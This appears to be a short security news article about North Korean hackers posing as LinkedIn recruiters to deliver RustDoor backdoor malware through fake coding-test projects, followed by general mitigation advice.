North Korean hackers spread RustDoor Malware on LinkedIn

North Korean hackers are targeting LinkedIn users with advanced malware called RustDoor. This highlights the growing use of social engineering by state-sponsored groups, particularly from North Korea, on professional networking sites.

North Korean hackers are exploiting LinkedIn by posing as recruiters and HR professionals to target users.

Jamf Threat Labs reports that attackers create fake profiles mimicking real tech companies to offer job opportunities, bypassing initial skepticism.

Attackers target individuals in cryptocurrency and tech sectors by reviewing their social media activity. They initiate conversations, eventually leading to the delivery of malicious software, exploiting trust in professional networking.

RustDoor Malware

The attacks use RustDoor malware, often disguised as coding challenges or pre-employment tests. Victims receive seemingly legitimate projects, like Visual Studio tasks, which contain hidden malicious scripts that activate when the project is built.

These scripts download extra payloads from remote servers, embedding themselves deeply in the victim’s system. RustDoor malware functions as both an infostealer and backdoor, capable of downloading and uploading files, executing commands, and prompting users for passwords while posing as legitimate apps like Visual Studio.

The scripts download extra payloads, deeply embedding themselves in the victim’s system. RustDoor malware acts as an infostealer and backdoor, enabling file transfers, command execution, and password prompts while disguising itself as legitimate applications like Visual Studio.

Mitigation and Response

• Increased Attack Sophistication: Highlights the need for strong cybersecurity and awareness training.
• Educate Employees: Warn staff about risks from unsolicited contacts on LinkedIn and other social media.
• Verify Offers: Check the legitimacy of job offers and software requests before acting.
• Strengthen Defenses: Regularly update security software and systems. Use tools to detect unusual network activity.
• Focus on Cryptocurrency Sector: Companies in this sector should be extra cautious due to higher risks.
• State-Sponsored Threats: North Korean actors use sophisticated social engineering techniques.
• Stay Vigilant: Be proactive in cybersecurity practices to effectively manage and mitigate threats.

‍Follow Us on: Twitter, Instagram, Facebook to get the latest security news!